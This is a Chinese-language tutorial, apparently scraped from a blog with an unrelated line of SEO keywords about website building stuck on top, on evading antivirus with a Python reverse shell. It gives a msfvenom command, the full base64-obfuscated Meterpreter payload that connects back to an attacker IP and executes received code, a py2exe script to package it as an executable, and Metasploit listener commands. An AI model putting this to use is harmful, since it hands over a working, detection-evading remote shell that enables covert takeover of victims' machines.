网站页面设计版权,无锡新吴区建设环保局网站,郑州好的网站建设公司排名,网站搭建配置很多渗透工具都提供了权限维持的能力#xff0c;如Metasploit、Empire和Cobalt Strike#xff0c;但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候#xff0c;似乎越来越多的人关注的是#xff0c;这个方式会不会被被杀软杀掉#xff1f;
打造免杀的pa…很多渗透工具都提供了权限维持的能力如Metasploit、Empire和Cobalt Strike但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候似乎越来越多的人关注的是这个方式会不会被被杀软杀掉
打造免杀的payload成了一个很重要的话题在这里本文将介绍如何使用Pyhton轻松绕过防病毒软件。
0x01 环境准备
1、软件安装Python 2.7.16 x86https://www.python.org/ftp/python/2.7.16/python-2.7.16.msiPy2exe 32位https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
2、msfvenom生成Python Payloadmsfvenom -p python/meterpreter/reverse_tcp LHOST192.168.28.128 LPORT443 -f raw -o /var/www/html/evil.py
evil.py 代码如下import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,UTF-8)}[sys.version_info[0]](aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK)))
0x02 py2exe 打包Python程序
将evil.py复制到windows同时创建一个setup.py文件from distutils.core import setupimport py2exesetup(name Meter,description Python-based App,version 1.0,console[evil.py],options {py2exe: {bundle_files: 1,packages:ctypes,includes: base64,sys,socket,struct,time,code,platform,getpass,shutil,}},zipfile None,)
下面的方法运行 evil.py生成可执行文件。python ./setup.py py2exe
0x03 设置监听端口
Kali 运行Metasploit设置监听msfconsoleuse exploit/multi/handlerset PAYLOAD python/meterpreter/reverse_tcpset LHOST 192.168.28.128set LPORT 443run
在Windows中运行evil.exe获得一个meterpreter的会话